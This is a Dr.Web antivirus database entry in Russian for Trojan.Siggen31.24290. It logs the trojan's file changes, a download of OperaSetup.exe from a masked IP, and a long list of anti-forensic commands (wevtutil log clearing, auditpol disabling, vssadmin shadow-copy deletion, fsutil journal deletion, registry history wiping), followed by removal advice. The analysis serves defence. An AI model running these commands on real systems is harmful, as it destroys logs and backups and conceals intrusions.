Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen31.24290
Добавлен в вирусную базу Dr.Web:
2025-05-07
Описание добавлено:
2025-05-09
Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
удаляет теневые копии разделов.
Запускает на исполнение
'<SYSTEM32>\net.exe' stop pcasvc
'<SYSTEM32>\net.exe' stop DPS
Запускает большое число процессов
Изменения в файловой системе
Создает следующие файлы
%HOMEPATH%\desktop\operasetup.exe
<Текущая директория>\temp1.txt
<Текущая директория>\temp2.txt
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\tze5c09o\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\42yihn1e\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\kqvpqpcd\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\23dx3w26\desktop.ini
%APPDATA%\microsoft\windows\cookies\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012022010720220108\index.dat
%APPDATA%\microsoft\windows\iecompatcache\index.dat
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\antiphishing\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat
Удаляет следующие файлы
Перемещает следующие файлы
<Текущая директория>\temp2.txt в <Текущая директория>\temp3.txt
Изменяет следующие файлы
Подменяет следующие файлы
%LOCALAPPDATA%\Microsoft\Windows\<INETFILES>\Content.IE5\desktop.ini
%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\desktop.ini
Сетевая активность
Подключается к
TCP
Запросы HTTP GET
http://18#.###.228.154:3000/OperaSetup.exe via 18#.#36.228.154
Другое
Создает и запускает на исполнение
'%HOMEPATH%\desktop\operasetup.exe'
Запускает на исполнение
'<SYSTEM32>\cmd.exe' /c auditpol /set /category:"System" /success:disable /failure:disable
'<SYSTEM32>\wevtutil.exe' cl "Microsoft-Windows-PowerShell/Operational"
'<SYSTEM32>\cmd.exe' /c wevtutil cl "Microsoft-Windows-PowerShell/Operational"
'<SYSTEM32>\wevtutil.exe' cl "Windows PowerShell"
'<SYSTEM32>\cmd.exe' /c wevtutil cl "Windows PowerShell"
'<SYSTEM32>\cmd.exe' /c del "%APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" /f /q
'<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
'<SYSTEM32>\cmd.exe' /c del /s /f /q %WINDIR%\Prefetch\*.*
'<SYSTEM32>\cmd.exe' /c del /s /f /q %WINDIR%\temp\*.*
'<SYSTEM32>\cmd.exe' /c del /q /f /s "C:\Users\%USERNAME%\AppData\Local\Temp\*"
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.fss
'<SYSTEM32>\cmd.exe' /c del /f /q "%WINDIR%\IME\*.dll"
'<SYSTEM32>\sc.exe' stop DiagTrack
'<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /f
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\imgui.ini
'<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
'<SYSTEM32>\rundll32.exe' InetCpl.cpl,ClearMyTracksByProcess 255
'<SYSTEM32>\cmd.exe' /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-History"
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-History"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c sc stop DiagTrack && sc start DiagTrack
'<SYSTEM32>\cmd.exe' /c del %WINDIR%\Prefetch\*.pf /Q
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-History"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c del /s /q %WINDIR%\Temp\*
'<SYSTEM32>\cmd.exe' /c del /s /q %TEMP%\*
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-History"
'<SYSTEM32>\cmd.exe' /c del /q "%APPDATA%\Microsoft\Windows\Recent\*"
'<SYSTEM32>\net1.exe' start DPS
'<SYSTEM32>\net.exe' start DPS
'<SYSTEM32>\net1.exe' stop DPS
'<SYSTEM32>\cmd.exe' /c echo test > temp1.txt
'<SYSTEM32>\wevtutil.exe' el
'<SYSTEM32>\cmd.exe' /c wevtutil el
'<SYSTEM32>\cmd.exe' /c del temp3.txt
'<SYSTEM32>\cmd.exe' /c move temp2.txt temp3.txt
'<SYSTEM32>\cmd.exe' /c del /f /q "C:\Users\%USERNAME%\AppData\Roaming\discord\Local Storage\leveldb\updater.exe"
'<SYSTEM32>\cmd.exe' /c del temp1.txt
'%ProgramFiles%\internet explorer\iexplore.exe' -ResetDestinationList
'<SYSTEM32>\wevtutil.exe' cl Application
'<SYSTEM32>\fsutil.exe' usn deletejournal /d D
'<SYSTEM32>\cmd.exe' /c fsutil usn deletejournal /d D
'<SYSTEM32>\fsutil.exe' usn deletejournal /d C
'<SYSTEM32>\cmd.exe' /c fsutil usn deletejournal /d C
'<SYSTEM32>\cmd.exe' /c time 12:53:50
'<SYSTEM32>\cmd.exe' /c date 01-07-2022
'<SYSTEM32>\auditpol.exe' /set /category:"System" /success:disable /failure:disable
'<SYSTEM32>\cmd.exe' /c echo test > temp2.txt
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c wevtutil cl System
'<SYSTEM32>\wevtutil.exe' cl Security
'<SYSTEM32>\wevtutil.exe' cl System
'<SYSTEM32>\cmd.exe' /c net stop DPS && net start DPS
'<SYSTEM32>\net1.exe' stop pcasvc
'<SYSTEM32>\cmd.exe' /c net stop pcasvc && net start pcasvc
'<SYSTEM32>\cmd.exe' /c del /f /q "%WINDIR%\IME\auth.json"
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.fresh
'<SYSTEM32>\cmd.exe' /c del /f /q %ProgramFiles%\Epic Games\GTAV\imgui.ini
'<SYSTEM32>\cmd.exe' /c wevtutil cl Security
'<SYSTEM32>\cmd.exe' /c del /f /q "%ProgramFiles%\Epic Games\GTAV\imgui.ini"
'<SYSTEM32>\cmd.exe' /c wevtutil cl Application
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\settings.cock
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\packages.json
'<SYSTEM32>\auditpol.exe' /set /category:"System" /success:enable /failure:enable
'<SYSTEM32>\cmd.exe' /c auditpol /set /category:"System" /success:enable /failure:enable
'<SYSTEM32>\w32tm.exe' /resync
'<SYSTEM32>\cmd.exe' /c w32tm /resync
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.flk
'<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK